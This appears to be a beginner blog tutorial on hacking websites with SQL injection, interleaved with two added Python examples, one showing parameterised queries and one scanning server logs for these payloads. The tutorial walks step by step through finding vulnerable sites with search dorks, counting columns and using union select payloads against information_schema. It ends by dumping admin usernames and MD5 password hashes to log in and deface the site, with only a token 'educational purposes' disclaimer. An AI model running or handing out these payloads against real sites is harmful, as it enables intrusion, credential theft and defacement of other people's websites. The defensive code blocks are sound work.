Hack Website with Sql Injection for Noobs





SQL Injection Tutorial! 100% NOOB FRIENDLY!!

Hi, this tutorial covers all your basic SQL Injection
needs. After reading this, you should be able to
successfully retrieve Database information such as
the username and password that are crucial for
defacing sites.

Lets start.
What is SQL Injection?
SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an
application (like queries). The vulnerability is present
when user input is either incorrectly filtered for string
literal escape characters embedded in SQL
statements or user input is not strongly typed and
thereby unexpectedly executed. It is an instance of a
more general class of vulnerabilities that can occur
whenever one programming or scripting language is
embedded inside another. SQL injection attacks are
also known as SQL insertion attacks.
Source: Wikipedia, "SQL injection".

Step 1: Choose Your Target:
Of course, you can’t SQL Inject nothing. You must
have a website as a target. Remember, only vulnerable
sites are able to be injected into. You can’t just SQL
Inject any site *sigh*.

So how do we see which sites are vulnerable? There
are many lists of vulnerable sites out there. But if you
wish to find them manually, read on.
Dorks
Wtf is this? "Dorks" are search queries that you can use to
find vulnerable sites. Go to Google, simply copy
and paste one of those dorks and click search.
I personally recommend going here (the scanner seems to
be down) to see which sites are vulnerable, but if you
wish to do THAT manually also, read on. If not, skip
to Step 2.
After you have Googled the dorks, click on any site.
To check the site for vulnerability, simply add a “‘” to
the end of the URL (without the quotes). It should
look somewhat like this:

Code:
http://www.sitename.com/main.php?id=232'

If the page simply refreshes, the site is not
vulnerable. But if an error of any kind pops up, the
site is prone to SQLi. When you have successfully
found a vulnerable site, proceed to Step 2.

Step 2: Find the Vulnerable Column
Now that we found our vulnerable site, we will need
to find the vulnerable columns.
Add this to the end of the URL:

Code:
http://www.sitename.com/main.php?id=232 order by 1--

Now here’s where it gets tougher (not really). You
have to look for errors as you enter new numbers.
For example:

Code:
http://www.sitename.com/main.php?id=232 order by 1-- (no error)
http://www.sitename.com/main.php?id=232 order by 2-- (no error)
http://www.sitename.com/main.php?id=232 order by 10-- (ERROR!)
http://www.sitename.com/main.php?id=232 order by 5-- (no error)
http://www.sitename.com/main.php?id=232 order by 6-- (ERROR!)

The goal here is to find the lowest column number that
produces the error. As you can see in the example, the lowest
number that gave an error is 6,
therefore column 6 doesn't exist and there are only 5
columns.
Now we have to find which one of these five columns
(it may be different in your case) is vulnerable. To do
that, add this code to the end of the URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,4,5--

Make sure to include the - in front of the id (-232) and the
-- at the end, this is crucial. Remember that the code
above may be different in your case regarding how
many columns there are.
Now, if you see numbers on the screen, you can
proceed. The first number that appears is the number of the
vulnerable column. If the number is "4" that means
that the 4th column is the vulnerable column.
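To see why the "'" and "order by" probes behave the way the tutorial describes, and what actually closes the hole, here is an added example (not code from the original post) using an in-memory SQLite stand-in for the site's database; the table and column names are constructed. The concatenating lookup reproduces the errors and the injected 1,2,3,4,5 row, while the parameterised lookup treats the same input as a plain value and never runs it as SQL.

```python
import sqlite3

# Constructed stand-in for the site's database: the news table has five columns,
# which is why "order by 5" succeeds and "order by 6" errors in the walk-through above.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
        INSERT INTO news VALUES (232, 'Welcome', 'First post', 'editor', '2011-10-10');
    """)
    return conn

def lookup_vulnerable(conn, raw_id):
    """main.php?id=... as the tutorial assumes it is written: the parameter is glued into the SQL."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, raw_id):
    """Same lookup with a bound parameter: the input is only ever compared as a value."""
    sql = "SELECT id, title, body, author, posted FROM news WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()

def probe(lookup, raw_id):
    """Run one request and report what the tester watches for: an error or a normal page."""
    try:
        return ("ok", lookup(make_db(), raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    for payload in ("232", "232'", "232 order by 5--", "232 order by 6--",
                    "-232 union select 1,2,3,4,5--"):
        print(repr(payload))
        print("  concatenated: ", probe(lookup_vulnerable, payload))
        print("  parameterised:", probe(lookup_safe, payload))
```

The parameterised version also returns nothing (rather than erroring) for the malformed inputs, so an attacker gets no error signal and no injected row.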

Step 3: Obtain Version Number and Database Name
That vulnerable column is the ONLY column that we
will be editing.
Assuming that the vulnerable column is 4 (it may be
different in your case), proceed to find the version
number. To find the version number, replace the
vulnerable column with “@@version” like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,@@version,5--

If the version is 5 or above, proceed. If not, it will be
harder to hack. There are other tutorials covering
how to hack database versions 4 or lower.
Now we must find the database name. To do this,
replace the “@@version” from before with “concat
(database())” like this:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,concat(database()),5--

And BOOM! The database name should appear on
your screen. Copy this somewhere safe, we will need
this for later.

Step 4: Obtain Table Names
We are almost done, don’t give up just yet.
Now we have to find the table names. This is crucial
because the tables contain all of the information that
we may need. Some hackers look for credit card
information and e-mail addresses, but in this tutorial
we will be looking to retrieve the username and
password in order to deface the site.
Edit the code as follows:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()--

Now, table names appear. Look for obvious names hinting
at tables where user information can be stored. You
are looking for table names such as "Admin", "Users",
"Members", "Admin_Id", "Admin_pass", "User_id", etc.

The last character is chopped off? Don’t worry. Count
how many tables you can see, then add this code
based on the tables that you can see. We will be
assuming that the last table you can see is the 8th
table.

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,table_name,5 from information_schema.tables where table_schema=database() limit 8,1--

This code is to view the 9th table. Replace the 8 with
a 9 to view the 10th table, and so on until you find
the table that you think has the most crucial
information.
When you find the table, copy the name somewhere
safe. We will need both the database and table
names for the next step.
For this tutorial, we will be using the table name of
“admin”.

Step 5: View the Columns, and Find the Crucial Shit
Here comes the fun part :3
To find the column names, add this to the end of the
URL:

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name="admin"--
Didju get an error? OH NO! YOU FAIL. Choose another
site. Just kidding.

Go here and type in your table name where it says
"Say Hello to My Little Friend".
In my case, this is the string that I got after I
inputted “admin” to the input space:
Code:
61646d696e

Now, replace the table name with hex as so:
Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name=0x61646d696e--

Notice how I added the “0x”, that is to indicate that
hex is being used. Remember to get rid of the quotes.
Now after you enter this code, you should see where
all the juicy information is contained. An example of
what you should see is:

Code:
Admin_Username, Admin_Pass, Admin_credentials,
User_credentials, Members, etc..
Now say you want to view what is in the
“Admin_Username” and the “Admin_pass”, add this
code (in this example we will be using “database” as
the database name and “admin” for the table name):

Code:
http://www.sitename.com/main.php?id=-232 union select 1,2,3,group_concat(Admin_Username,0x3a,Admin_Pass),5 FROM database.admin--

The "0x3a" is the hex for a colon (:), which separates the
two values. You should get something like this:

Code:
1:MyName:e10adc3949ba59abbe56e057f20f883e
The username is “MyName” and the password is..
WAIT! That is MD5, crack this using Havij. Download
Havij here.

Now, as you can see, this is the login info:
Code:
Username: MyName
Pass: 123456

Now all you have to do is find the admin page, which
is usually
Code:
http://www.sitename.com/admin
http://www.sitename.com/adminlogin
http://www.sitename.com/admin_login
http://www.sitename.com/login
or something similar. There are tools online that will
find you the admin page.
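From the defender's side, every step above leaves a distinctive request in the web server log. The following added example (not part of the original tutorial) scans constructed common-log-format lines for the payload patterns this page walks through, after URL-decoding them, and decodes 0x hex literals so an analyst can see which table (here 0x61646d696e, i.e. "admin") was being queried. The host, IP address and log lines are all constructed.

```python
import re
from urllib.parse import unquote_plus

# Signatures lifted from the payloads walked through above, matched after URL-decoding.
SIGNATURES = {
    "quote_probe": re.compile(r"=\d+'(?:&|$)"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "version_or_db": re.compile(r"@@version|\bdatabase\(\)", re.I),
}
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")
# Common log format: client ident user [time] "METHOD path HTTP/x" status bytes
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})', re.M)

# Constructed sample lines replaying the tutorial's sequence against a fictional host.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2011:13:55:36 +0000] "GET /main.php?id=232 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2011:13:55:40 +0000] "GET /main.php?id=232%27 HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2011:13:55:52 +0000] "GET /main.php?id=232%20order%20by%206-- HTTP/1.1" 500 312
203.0.113.5 - - [10/Oct/2011:13:56:10 +0000] "GET /main.php?id=-232%20union%20select%201,2,3,@@version,5-- HTTP/1.1" 200 4870
203.0.113.5 - - [10/Oct/2011:13:57:02 +0000] "GET /main.php?id=-232%20union%20select%201,2,3,group_concat(column_name),5%20from%20information_schema.columns%20where%20table_name=0x61646d696e-- HTTP/1.1" 200 4902
"""

def decode_hex_literals(query):
    """Turn 0x61646d696e-style literals back into text so the targeted table name is visible."""
    decoded = []
    for h in HEX_LITERAL.findall(query):
        try:
            decoded.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<binary:" + h + ">")
    return decoded

def inspect_path(path):
    """Return (signature names that fired, decoded hex literals) for one request path."""
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return hits, decode_hex_literals(query)

def scan_log(text):
    """Return (client_ip, status, hits, hex_values) for each request that trips a signature."""
    findings = []
    for m in LOG_LINE.finditer(text):
        ip, path, status = m.groups()
        hits, hexes = inspect_path(path)
        if hits:
            findings.append((ip, int(status), hits, hexes))
    return findings
```

A burst of 500 responses followed by 200s on union select requests from one client is the signature of the column-counting stage succeeding, so the status code is kept alongside the pattern hits.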

Thanks for reading my first tutorial on hacking a website, but it is only for educational purposes. I am not responsible for any illegal activity done by you. If you need any help then comment below. Malik ubi...